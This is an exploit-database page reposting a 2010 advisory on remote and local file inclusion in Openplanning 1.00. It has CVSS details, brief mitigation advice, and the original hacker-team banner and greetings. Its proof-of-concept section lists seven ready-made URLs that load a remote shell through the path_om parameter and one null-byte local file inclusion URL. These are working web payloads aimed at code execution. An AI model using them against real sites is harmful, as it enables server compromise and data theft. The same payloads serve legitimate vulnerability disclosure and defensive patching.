header-logo
Suggest Exploit
vendor:
Openplanning
by:
cr4wl3r
7.5
CVSS
HIGH
RFI/LFI
CWE
Product Name: Openplanning
Affected Version From: Openplanning 1.00
Affected Version To: Openplanning 1.00
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Openplanning 1.00 (RFI/LFI) Multiple File Include Vulnerability

Openplanning 1.00 is vulnerable to a Remote File Inclusion (RFI) and Local File Inclusion (LFI) vulnerability. This vulnerability allows an attacker to include arbitrary files from a remote or local file system, potentially leading to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or update from the vendor. Additionally, ensure that input validation and sanitization measures are in place to prevent unauthorized file inclusion.
Source

Exploit-DB raw data:

===============================================================
Openplanning 1.00 (RFI/LFI) Multiple File Include Vulnerability
===============================================================

[+] Openplanning 1.00 (RFI/LFI) Multiple File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Download: https://adullact.net/frs/download.php/4872/openmairie_planning_1.00.zip
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id
[+] Thanks to: str0ke, opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
               EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
               SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[+] PoC:

[~] RFI:
http://shell4u.tk/[path]/gen/obj/categorie.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/profil.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/collectivite.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/ressource.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/droit.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/utilisateur.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/planning.class.php?path_om=[Shell]

[~] LFI:
http://shell4u.tk/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]


# Inj3ct0r.com [2010-04-24]